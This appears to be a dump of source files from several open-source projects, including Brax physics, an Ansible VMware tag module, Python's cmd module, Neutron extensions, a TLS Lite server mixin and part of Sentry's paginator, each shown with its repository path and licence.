google/brax | brax/physics/system.py | 1 | 5576 | # Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint:disable=g-multiple-import
"""A brax system."""
import functools
from typing import Tuple
import jax
import jax.numpy as jnp
from brax.physics import actuators
from brax.physics import colliders
from brax.physics import config_pb2
from brax.physics import integrators
from brax.physics import joints
from brax.physics import tree
from brax.physics.base import Info, P, QP, validate_config, vec_to_np
class System:
"""A brax system."""
def __init__(self, config: config_pb2.Config):
self.config = validate_config(config)
self.num_bodies = len(config.bodies)
self.body_idx = {b.name: i for i, b in enumerate(config.bodies)}
self.active_pos = 1. * jnp.logical_not(
jnp.array([vec_to_np(b.frozen.position) for b in config.bodies]))
self.active_rot = 1. * jnp.logical_not(
jnp.array([vec_to_np(b.frozen.rotation) for b in config.bodies]))
self.box_plane = colliders.BoxPlane(config)
self.capsule_plane = colliders.CapsulePlane(config)
self.capsule_capsule = colliders.CapsuleCapsule(config)
self.num_joints = len(config.joints)
self.joint_revolute = joints.Revolute.from_config(config)
self.joint_universal = joints.Universal.from_config(config)
self.joint_spherical = joints.Spherical.from_config(config)
self.num_actuators = len(config.actuators)
self.num_joint_dof = sum(len(j.angle_limit) for j in config.joints)
self.angle_1d = actuators.Angle.from_config(config, self.joint_revolute)
self.angle_2d = actuators.Angle.from_config(config, self.joint_universal)
self.angle_3d = actuators.Angle.from_config(config, self.joint_spherical)
self.torque_1d = actuators.Torque.from_config(config, self.joint_revolute)
self.torque_2d = actuators.Torque.from_config(config, self.joint_universal)
self.torque_3d = actuators.Torque.from_config(config, self.joint_spherical)
@functools.partial(jax.jit, static_argnums=(0,))
def default_qp(self) -> QP:
"""Returns a default state for the system."""
root = tree.Link.from_config(self.config).to_world()
# raise any sub-trees above the ground plane
child_min_z = [(child, child.min_z()) for child in root.children]
# construct qps array that matches bodies order
qps = []
for body in self.config.bodies:
pos = jnp.array([0., 0., 0.])
rot = jnp.array([1., 0., 0., 0.])
for child, min_z in child_min_z:
link = child.rfind(body.name)
if link:
pos = link.pos - min_z * jnp.array([0., 0., 1.])
rot = link.rot
qp = QP(pos=pos, rot=rot, vel=jnp.zeros(3), ang=jnp.zeros(3))
qps.append(qp)
return jax.tree_multimap((lambda *args: jnp.stack(args)), *qps)
@functools.partial(jax.jit, static_argnums=(0,))
def info(self, qp: QP) -> Info:
"""Return info about a system state."""
dp_c = self.box_plane.apply(qp, 1.)
dp_c += self.capsule_plane.apply(qp, 1.)
dp_c += self.capsule_capsule.apply(qp, 1.)
dp_j = self.joint_revolute.apply(qp)
dp_j += self.joint_universal.apply(qp)
dp_j += self.joint_spherical.apply(qp)
dp_a = P(jnp.zeros((self.num_bodies, 3)), jnp.zeros((self.num_bodies, 3)))
info = Info(contact=dp_c, joint=dp_j, actuator=dp_a)
return info
@functools.partial(jax.jit, static_argnums=(0,))
def step(self, qp: QP, act: jnp.ndarray) -> Tuple[QP, Info]:
"""Calculates a physics step for a system, returns next state and info."""
def substep(carry, _):
qp, info = carry
dt = self.config.dt / self.config.substeps
# apply kinetic step
qp = integrators.kinetic(self.config, qp, dt, self.active_pos,
self.active_rot)
# apply impulses arising from joints and actuators
dp_j = self.joint_revolute.apply(qp)
dp_j += self.joint_universal.apply(qp)
dp_j += self.joint_spherical.apply(qp)
dp_a = self.angle_1d.apply(qp, act)
dp_a += self.angle_2d.apply(qp, act)
dp_a += self.angle_3d.apply(qp, act)
dp_a += self.torque_1d.apply(qp, act)
dp_a += self.torque_2d.apply(qp, act)
dp_a += self.torque_3d.apply(qp, act)
qp = integrators.potential(self.config, qp, dp_j + dp_a, dt,
self.active_pos, self.active_rot)
# apply collision velocity updates
dp_c = self.box_plane.apply(qp, dt)
dp_c += self.capsule_plane.apply(qp, dt)
dp_c += self.capsule_capsule.apply(qp, dt)
qp = integrators.potential_collision(self.config, qp, dp_c,
self.active_pos, self.active_rot)
info = Info(
contact=info.contact + dp_c,
joint=info.joint + dp_j,
actuator=info.actuator + dp_a)
return (qp, info), ()
zero = P(jnp.zeros((self.num_bodies, 3)), jnp.zeros((self.num_bodies, 3)))
info = Info(contact=zero, joint=zero, actuator=zero)
(qp, info), _ = jax.lax.scan(substep, (qp, info), (), self.config.substeps)
return qp, info
| apache-2.0 |
pilou-/ansible | lib/ansible/modules/cloud/vmware/vmware_tag.py | 7 | 8097 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_tag
short_description: Manage VMware tags
description:
- This module can be used to create / delete / update VMware tags.
- Tag feature is introduced in vSphere 6 version, so this module is not supported in the earlier versions of vSphere.
- All variables and VMware object names are case sensitive.
version_added: '2.6'
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
- vSphere Automation SDK
options:
tag_name:
description:
- The name of tag to manage.
required: True
tag_description:
description:
- The tag description.
- This is required only if C(state) is set to C(present).
- This parameter is ignored, when C(state) is set to C(absent).
- Process of updating tag only allows description change.
required: False
default: ''
category_id:
description:
- The unique ID generated by vCenter should be used to.
- User can get this unique ID from facts module.
required: False
state:
description:
- The state of tag.
- If set to C(present) and tag does not exists, then tag is created.
- If set to C(present) and tag exists, then tag is updated.
- If set to C(absent) and tag exists, then tag is deleted.
- If set to C(absent) and tag does not exists, no action is taken.
required: False
default: 'present'
choices: [ 'present', 'absent' ]
extends_documentation_fragment: vmware_rest_client.documentation
'''
EXAMPLES = r'''
- name: Create a tag
vmware_tag:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
validate_certs: no
category_id: 'urn:vmomi:InventoryServiceCategory:e785088d-6981-4b1c-9fb8-1100c3e1f742:GLOBAL'
tag_name: Sample_Tag_0002
tag_description: Sample Description
state: present
delegate_to: localhost
- name: Update tag description
vmware_tag:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
tag_name: Sample_Tag_0002
tag_description: Some fancy description
state: present
delegate_to: localhost
- name: Delete tag
vmware_tag:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
tag_name: Sample_Tag_0002
state: absent
delegate_to: localhost
'''
RETURN = r'''
results:
description: dictionary of tag metadata
returned: on success
type: dict
sample: {
"msg": "Tag 'Sample_Tag_0002' created.",
"tag_id": "urn:vmomi:InventoryServiceTag:bff91819-f529-43c9-80ca-1c9dfda09441:GLOBAL"
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware_rest_client import VmwareRestClient
class VmwareTag(VmwareRestClient):
def __init__(self, module):
super(VmwareTag, self).__init__(module)
self.global_tags = dict()
# api_client to call APIs instead of individual service
self.tag_service = self.api_client.tagging.Tag
self.tag_name = self.params.get('tag_name')
self.get_all_tags()
self.category_service = self.api_client.tagging.Category
def ensure_state(self):
"""
Manage internal states of tags
"""
desired_state = self.params.get('state')
states = {
'present': {
'present': self.state_update_tag,
'absent': self.state_create_tag,
},
'absent': {
'present': self.state_delete_tag,
'absent': self.state_unchanged,
}
}
states[desired_state][self.check_tag_status()]()
def state_create_tag(self):
"""
Create tag
"""
tag_spec = self.tag_service.CreateSpec()
tag_spec.name = self.tag_name
tag_spec.description = self.params.get('tag_description')
category_id = self.params.get('category_id', None)
if category_id is None:
self.module.fail_json(msg="'category_id' is required parameter while creating tag.")
category_found = False
for category in self.category_service.list():
category_obj = self.category_service.get(category)
if category_id == category_obj.id:
category_found = True
break
if not category_found:
self.module.fail_json(msg="Unable to find category specified using 'category_id' - %s" % category_id)
tag_spec.category_id = category_id
tag_id = self.tag_service.create(tag_spec)
if tag_id:
self.module.exit_json(changed=True,
results=dict(msg="Tag '%s' created." % tag_spec.name,
tag_id=tag_id))
self.module.exit_json(changed=False,
results=dict(msg="No tag created", tag_id=''))
def state_unchanged(self):
"""
Return unchanged state
"""
self.module.exit_json(changed=False)
def state_update_tag(self):
"""
Update tag
"""
changed = False
tag_id = self.global_tags[self.tag_name]['tag_id']
results = dict(msg="Tag %s is unchanged." % self.tag_name,
tag_id=tag_id)
tag_update_spec = self.tag_service.UpdateSpec()
tag_desc = self.global_tags[self.tag_name]['tag_description']
desired_tag_desc = self.params.get('tag_description')
if tag_desc != desired_tag_desc:
tag_update_spec.description = desired_tag_desc
self.tag_service.update(tag_id, tag_update_spec)
results['msg'] = 'Tag %s updated.' % self.tag_name
changed = True
self.module.exit_json(changed=changed, results=results)
def state_delete_tag(self):
"""
Delete tag
"""
tag_id = self.global_tags[self.tag_name]['tag_id']
self.tag_service.delete(tag_id=tag_id)
self.module.exit_json(changed=True,
results=dict(msg="Tag '%s' deleted." % self.tag_name,
tag_id=tag_id))
def check_tag_status(self):
"""
Check if tag exists or not
Returns: 'present' if tag found, else 'absent'
"""
ret = 'present' if self.tag_name in self.global_tags else 'absent'
return ret
def get_all_tags(self):
"""
Retrieve all tag information
"""
for tag in self.tag_service.list():
tag_obj = self.tag_service.get(tag)
self.global_tags[tag_obj.name] = dict(tag_description=tag_obj.description,
tag_used_by=tag_obj.used_by,
tag_category_id=tag_obj.category_id,
tag_id=tag_obj.id
)
def main():
argument_spec = VmwareRestClient.vmware_client_argument_spec()
argument_spec.update(
tag_name=dict(type='str', required=True),
tag_description=dict(type='str', default='', required=False),
category_id=dict(type='str', required=False),
state=dict(type='str', choices=['present', 'absent'], default='present', required=False),
)
module = AnsibleModule(argument_spec=argument_spec)
vmware_tag = VmwareTag(module)
vmware_tag.ensure_state()
if __name__ == '__main__':
main()
| gpl-3.0 |
javilonas/NCam | cross/android-toolchain/lib/python2.7/cmd.py | 145 | 15026 | """A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
These interpreters use raw_input; thus, if the readline module is loaded,
they automatically support Emacs-like command history and editing features.
"""
import string
__all__ = ["Cmd"]
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'
class Cmd:
"""A simple framework for writing line-oriented command interpreters.
These are often useful for test harnesses, administrative tools, and
prototypes that will later be wrapped in a more sophisticated interface.
A Cmd instance or subclass instance is a line-oriented interpreter
framework. There is no good reason to instantiate Cmd itself; rather,
it's useful as a superclass of an interpreter class you define yourself
in order to inherit Cmd's methods and encapsulate action methods.
"""
prompt = PROMPT
identchars = IDENTCHARS
ruler = '='
lastcmd = ''
intro = None
doc_leader = ""
doc_header = "Documented commands (type help <topic>):"
misc_header = "Miscellaneous help topics:"
undoc_header = "Undocumented commands:"
nohelp = "*** No help on %s"
use_rawinput = 1
def __init__(self, completekey='tab', stdin=None, stdout=None):
"""Instantiate a line-oriented interpreter framework.
The optional argument 'completekey' is the readline name of a
completion key; it defaults to the Tab key. If completekey is
not None and the readline module is available, command completion
is done automatically. The optional arguments stdin and stdout
specify alternate input and output file objects; if not specified,
sys.stdin and sys.stdout are used.
"""
import sys
if stdin is not None:
self.stdin = stdin
else:
self.stdin = sys.stdin
if stdout is not None:
self.stdout = stdout
else:
self.stdout = sys.stdout
self.cmdqueue = []
self.completekey = completekey
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
"""
self.preloop()
if self.use_rawinput and self.completekey:
try:
import readline
self.old_completer = readline.get_completer()
readline.set_completer(self.complete)
readline.parse_and_bind(self.completekey+": complete")
except ImportError:
pass
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro)+"\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
if self.use_rawinput:
try:
line = raw_input(self.prompt)
except EOFError:
line = 'EOF'
else:
self.stdout.write(self.prompt)
self.stdout.flush()
line = self.stdin.readline()
if not len(line):
line = 'EOF'
else:
line = line.rstrip('\r\n')
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
finally:
if self.use_rawinput and self.completekey:
try:
import readline
readline.set_completer(self.old_completer)
except ImportError:
pass
def precmd(self, line):
"""Hook method executed just before the command line is
interpreted, but after the input prompt is generated and issued.
"""
return line
def postcmd(self, stop, line):
"""Hook method executed just after a command dispatch is finished."""
return stop
def preloop(self):
"""Hook method executed once when the cmdloop() method is called."""
pass
def postloop(self):
"""Hook method executed once when the cmdloop() method is about to
return.
"""
pass
def parseline(self, line):
"""Parse the line into a command name and a string containing
the arguments. Returns a tuple containing (command, args, line).
'command' and 'args' may be None if the line couldn't be parsed.
"""
line = line.strip()
if not line:
return None, None, line
elif line[0] == '?':
line = 'help ' + line[1:]
elif line[0] == '!':
if hasattr(self, 'do_shell'):
line = 'shell ' + line[1:]
else:
return None, None, line
i, n = 0, len(line)
while i < n and line[i] in self.identchars: i = i+1
cmd, arg = line[:i], line[i:].strip()
return cmd, arg, line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
This may be overridden, but should not normally need to be;
see the precmd() and postcmd() methods for useful execution hooks.
The return value is a flag indicating whether interpretation of
commands by the interpreter should stop.
"""
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if line == 'EOF' :
self.lastcmd = ''
if cmd == '':
return self.default(line)
else:
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
return self.default(line)
return func(arg)
def emptyline(self):
"""Called when an empty line is entered in response to the prompt.
If this method is not overridden, it repeats the last nonempty
command entered.
"""
if self.lastcmd:
return self.onecmd(self.lastcmd)
def default(self, line):
"""Called on an input line when the command prefix is not recognized.
If this method is not overridden, it prints an error message and
returns.
"""
self.stdout.write('*** Unknown syntax: %s\n'%line)
def completedefault(self, *ignored):
"""Method called to complete an input line when no command-specific
complete_*() method is available.
By default, it returns an empty list.
"""
return []
def completenames(self, text, *ignored):
dotext = 'do_'+text
return [a[3:] for a in self.get_names() if a.startswith(dotext)]
def complete(self, text, state):
"""Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if state == 0:
import readline
origline = readline.get_line_buffer()
line = origline.lstrip()
stripped = len(origline) - len(line)
begidx = readline.get_begidx() - stripped
endidx = readline.get_endidx() - stripped
if begidx>0:
cmd, args, foo = self.parseline(line)
if cmd == '':
compfunc = self.completedefault
else:
try:
compfunc = getattr(self, 'complete_' + cmd)
except AttributeError:
compfunc = self.completedefault
else:
compfunc = self.completenames
self.completion_matches = compfunc(text, line, begidx, endidx)
try:
return self.completion_matches[state]
except IndexError:
return None
def get_names(self):
# This method used to pull in base class attributes
# at a time dir() didn't do it yet.
return dir(self.__class__)
def complete_help(self, *args):
commands = set(self.completenames(*args))
topics = set(a[5:] for a in self.get_names()
if a.startswith('help_' + args[0]))
return list(commands | topics)
def do_help(self, arg):
'List available commands with "help" or detailed help with "help cmd".'
if arg:
# XXX check arg syntax
try:
func = getattr(self, 'help_' + arg)
except AttributeError:
try:
doc=getattr(self, 'do_' + arg).__doc__
if doc:
self.stdout.write("%s\n"%str(doc))
return
except AttributeError:
pass
self.stdout.write("%s\n"%str(self.nohelp % (arg,)))
return
func()
else:
names = self.get_names()
cmds_doc = []
cmds_undoc = []
help = {}
for name in names:
if name[:5] == 'help_':
help[name[5:]]=1
names.sort()
# There can be duplicates if routines overridden
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
cmd=name[3:]
if cmd in help:
cmds_doc.append(cmd)
del help[cmd]
elif getattr(self, name).__doc__:
cmds_doc.append(cmd)
else:
cmds_undoc.append(cmd)
self.stdout.write("%s\n"%str(self.doc_leader))
self.print_topics(self.doc_header, cmds_doc, 15,80)
self.print_topics(self.misc_header, help.keys(),15,80)
self.print_topics(self.undoc_header, cmds_undoc, 15,80)
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
self.stdout.write("%s\n"%str(header))
if self.ruler:
self.stdout.write("%s\n"%str(self.ruler * len(header)))
self.columnize(cmds, maxcol-1)
self.stdout.write("\n")
def columnize(self, list, displaywidth=80):
"""Display a list of strings as a compact set of columns.
Each column is only as wide as necessary.
Columns are separated by two spaces (one was not legible enough).
"""
if not list:
self.stdout.write("<empty>\n")
return
nonstrings = [i for i in range(len(list))
if not isinstance(list[i], str)]
if nonstrings:
raise TypeError, ("list[i] not a string for i in %s" %
", ".join(map(str, nonstrings)))
size = len(list)
if size == 1:
self.stdout.write('%s\n'%str(list[0]))
return
# Try every row count from 1 upwards
for nrows in range(1, len(list)):
ncols = (size+nrows-1) // nrows
colwidths = []
totwidth = -2
for col in range(ncols):
colwidth = 0
for row in range(nrows):
i = row + nrows*col
if i >= size:
break
x = list[i]
colwidth = max(colwidth, len(x))
colwidths.append(colwidth)
totwidth += colwidth + 2
if totwidth > displaywidth:
break
if totwidth <= displaywidth:
break
else:
nrows = len(list)
ncols = 1
colwidths = [0]
for row in range(nrows):
texts = []
for col in range(ncols):
i = row + nrows*col
if i >= size:
x = ""
else:
x = list[i]
texts.append(x)
while texts and not texts[-1]:
del texts[-1]
for col in range(len(texts)):
texts[col] = texts[col].ljust(colwidths[col])
self.stdout.write("%s\n"%str(" ".join(texts)))
| gpl-3.0 |
burstlam/zte-kernel-gb | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 802 | 2710 | # Core.py - Python extension for perf trace, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
return defaultdict(autodict)
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
# nothing to do, really
pass
def define_symbolic_value(event_name, field_name, value, field_str):
symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
string = ""
if flag_fields[event_name][field_name]:
print_delim = 0
keys = flag_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string += flag_fields[event_name][field_name]['values'][idx]
break
if idx and (value & idx) == idx:
if print_delim and flag_fields[event_name][field_name]['delim']:
string += " " + flag_fields[event_name][field_name]['delim'] + " "
string += flag_fields[event_name][field_name]['values'][idx]
print_delim = 1
value &= ~idx
return string
def symbol_str(event_name, field_name, value):
string = ""
if symbolic_fields[event_name][field_name]:
keys = symbolic_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string = symbolic_fields[event_name][field_name]['values'][idx]
break
if (value == idx):
string = symbolic_fields[event_name][field_name]['values'][idx]
break
return string
trace_flags = { 0x00: "NONE", \
0x01: "IRQS_OFF", \
0x02: "IRQS_NOSUPPORT", \
0x04: "NEED_RESCHED", \
0x08: "HARDIRQ", \
0x10: "SOFTIRQ" }
def trace_flag_str(value):
string = ""
print_delim = 0
keys = trace_flags.keys()
for idx in keys:
if not value and not idx:
string += "NONE"
break
if idx and (value & idx) == idx:
if print_delim:
string += " | ";
string += trace_flags[idx]
print_delim = 1
value &= ~idx
return string
| gpl-2.0 |
blueboxgroup/neutron | neutron/agent/l3/config.py | 1 | 2906 | # Copyright (c) 2015 OpenStack Foundation.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
OPTS = [
cfg.StrOpt('agent_mode', default='legacy',
help=_("The working mode for the agent. Allowed modes are: "
"'legacy' - this preserves the existing behavior "
"where the L3 agent is deployed on a centralized "
"networking node to provide L3 services like DNAT, "
"and SNAT. Use this mode if you do not want to "
"adopt DVR. 'dvr' - this mode enables DVR "
"functionality and must be used for an L3 agent "
"that runs on a compute host. 'dvr_snat' - this "
"enables centralized SNAT support in conjunction "
"with DVR. This mode must be used for an L3 agent "
"running on a centralized node (or in single-host "
"deployments, e.g. devstack)")),
cfg.StrOpt('external_network_bridge', default='br-ex',
help=_("Name of bridge used for external network "
"traffic.")),
cfg.IntOpt('metadata_port',
default=9697,
help=_("TCP Port used by Neutron metadata namespace "
"proxy.")),
cfg.IntOpt('send_arp_for_ha',
default=3,
help=_("Send this many gratuitous ARPs for HA setup, if "
"less than or equal to 0, the feature is disabled")),
cfg.StrOpt('router_id', default='',
help=_("If namespaces is disabled, the l3 agent can only"
" configure a router that has the matching router "
"ID.")),
cfg.BoolOpt('handle_internal_only_routers',
default=True,
help=_("Agent should implement routers with no gateway")),
cfg.StrOpt('gateway_external_network_id', default='',
help=_("UUID of external network for routers implemented "
"by the agents.")),
cfg.BoolOpt('enable_metadata_proxy', default=True,
help=_("Allow running metadata proxy.")),
cfg.BoolOpt('router_delete_namespaces', default=False,
help=_("Delete namespace after removing a router."))
]
| apache-2.0 |
mahak/neutron | neutron/extensions/quotasv2_detail.py | 2 | 3597 | # Copyright 2017 Intel Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api import extensions as api_extensions
from neutron_lib.api import faults
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_config import cfg
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import resource
from neutron.db.quota import driver
from neutron.db.quota import driver_nolock
from neutron.extensions import quotasv2
from neutron.quota import resource_registry
DETAIL_QUOTAS_ACTION = 'details'
RESOURCE_NAME = 'quota'
ALIAS = RESOURCE_NAME + '_' + DETAIL_QUOTAS_ACTION
QUOTA_DRIVER = cfg.CONF.QUOTAS.quota_driver
RESOURCE_COLLECTION = RESOURCE_NAME + "s"
DB_QUOTA_DRIVERS = tuple('.'.join([klass.__module__, klass.__name__])
for klass in (driver.DbQuotaDriver,
driver_nolock.DbQuotaNoLockDriver,
)
)
EXTENDED_ATTRIBUTES_2_0 = {
RESOURCE_COLLECTION: {}
}
class DetailQuotaSetsController(quotasv2.QuotaSetsController):
def _get_detailed_quotas(self, request, tenant_id):
return self._driver.get_detailed_tenant_quotas(
request.context,
resource_registry.get_all_resources(), tenant_id)
def details(self, request, id):
if id != request.context.project_id:
# Check if admin
if not request.context.is_admin:
reason = _("Only admin is authorized to access quotas for"
" another tenant")
raise n_exc.AdminRequired(reason=reason)
return {self._resource_name:
self._get_detailed_quotas(request, id)}
class Quotasv2_detail(api_extensions.ExtensionDescriptor):
"""Quota details management support."""
# Ensure new extension is not loaded with old conf driver.
extensions.register_custom_supported_check(
ALIAS, lambda: QUOTA_DRIVER in DB_QUOTA_DRIVERS, plugin_agnostic=True)
@classmethod
def get_name(cls):
return "Quota details management support"
@classmethod
def get_alias(cls):
return ALIAS
@classmethod
def get_description(cls):
return 'Expose functions for quotas usage statistics per project'
@classmethod
def get_updated(cls):
return "2017-02-10T10:00:00-00:00"
@classmethod
def get_resources(cls):
"""Returns Extension Resources."""
controller = resource.Resource(
DetailQuotaSetsController(directory.get_plugin()),
faults=faults.FAULT_MAP)
return [extensions.ResourceExtension(
RESOURCE_COLLECTION,
controller,
member_actions={'details': 'GET'},
collection_actions={'tenant': 'GET'})]
def get_extended_resources(self, version):
return EXTENDED_ATTRIBUTES_2_0 if version == "2.0" else {}
def get_required_extensions(self):
return ["quotas"]
| apache-2.0 |
kampanita/pelisalacarta | python/main-classic/lib/gdata/tlslite/integration/TLSSocketServerMixIn.py | 320 | 2203 | """TLS Lite + SocketServer."""
from gdata.tlslite.TLSConnection import TLSConnection
class TLSSocketServerMixIn:
"""
This class can be mixed in with any L{SocketServer.TCPServer} to
add TLS support.
To use this class, define a new class that inherits from it and
some L{SocketServer.TCPServer} (with the mix-in first). Then
implement the handshake() method, doing some sort of server
handshake on the connection argument. If the handshake method
returns True, the RequestHandler will be triggered. Below is a
complete example of a threaded HTTPS server::
from SocketServer import *
from BaseHTTPServer import *
from SimpleHTTPServer import *
from tlslite.api import *
s = open("./serverX509Cert.pem").read()
x509 = X509()
x509.parse(s)
certChain = X509CertChain([x509])
s = open("./serverX509Key.pem").read()
privateKey = parsePEMKey(s, private=True)
sessionCache = SessionCache()
class MyHTTPServer(ThreadingMixIn, TLSSocketServerMixIn,
HTTPServer):
def handshake(self, tlsConnection):
try:
tlsConnection.handshakeServer(certChain=certChain,
privateKey=privateKey,
sessionCache=sessionCache)
tlsConnection.ignoreAbruptClose = True
return True
except TLSError, error:
print "Handshake failure:", str(error)
return False
httpd = MyHTTPServer(('localhost', 443), SimpleHTTPRequestHandler)
httpd.serve_forever()
"""
def finish_request(self, sock, client_address):
tlsConnection = TLSConnection(sock)
if self.handshake(tlsConnection) == True:
self.RequestHandlerClass(tlsConnection, client_address, self)
tlsConnection.close()
#Implement this method to do some form of handshaking. Return True
#if the handshake finishes properly and the request is authorized.
def handshake(self, tlsConnection):
raise NotImplementedError()
| gpl-3.0 |
vperron/sentry | src/sentry/api/paginator.py | 16 | 4291 | """
sentry.api.paginator
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import math
from datetime import datetime
from django.db import connections
from django.utils import timezone
from sentry.utils.cursors import build_cursor, Cursor
quote_name = connections['default'].ops.quote_name
class Paginator(object):
def __init__(self, queryset, order_by):
if order_by.startswith('-'):
self.key, self.desc = order_by[1:], True
else:
self.key, self.desc = order_by, False
self.queryset = queryset
def _get_item_key(self, item):
value = getattr(item, self.key)
if self.desc:
return math.ceil(value)
return math.floor(value)
def _value_from_cursor(self, cursor):
return cursor.value
def _get_results_from_qs(self, value, is_prev):
results = self.queryset
# "asc" controls whether or not we need to change the ORDER BY to
# ascending. If we're sorting by DESC but we're using a previous
# page cursor, we'll change the ordering to ASC and reverse the
# list below (this is so we know how to get the before/after post).
# If we're sorting ASC _AND_ we're not using a previous page cursor,
# then we'll need to resume using ASC.
asc = (self.desc and is_prev) or not (self.desc or is_prev)
# We need to reverse the ORDER BY if we're using a cursor for a
# previous page so we know exactly where we ended last page. The
# results will get reversed back to the requested order below.
if self.key in results.query.order_by:
if not asc:
index = results.query.order_by.index(self.key)
results.query.order_by[index] = '-%s' % (results.query.order_by[index])
elif ('-%s' % self.key) in results.query.order_by:
if asc:
index = results.query.order_by.index('-%s' % (self.key))
results.query.order_by[index] = results.query.order_by[index][1:]
else:
if asc:
results = results.order_by(self.key)
else:
results = results.order_by('-%s' % self.key)
if value:
if self.key in results.query.extra:
col_query, col_params = results.query.extra[self.key]
col_params = col_params[:]
else:
col_query, col_params = quote_name(self.key), []
col_params.append(value)
if asc:
results = results.extra(
where=['%s >= %%s' % (col_query,)],
params=col_params,
)
else:
results = results.extra(
where=['%s <= %%s' % (col_query,)],
params=col_params,
)
return results
def get_result(self, limit=100, cursor=None):
# cursors are:
# (identifier(integer), row offset, is_prev)
if cursor is None:
cursor = Cursor(0, 0, 0)
if cursor.value:
cursor_value = self._value_from_cursor(cursor)
else:
cursor_value = 0
queryset = self._get_results_from_qs(cursor_value, cursor.is_prev)
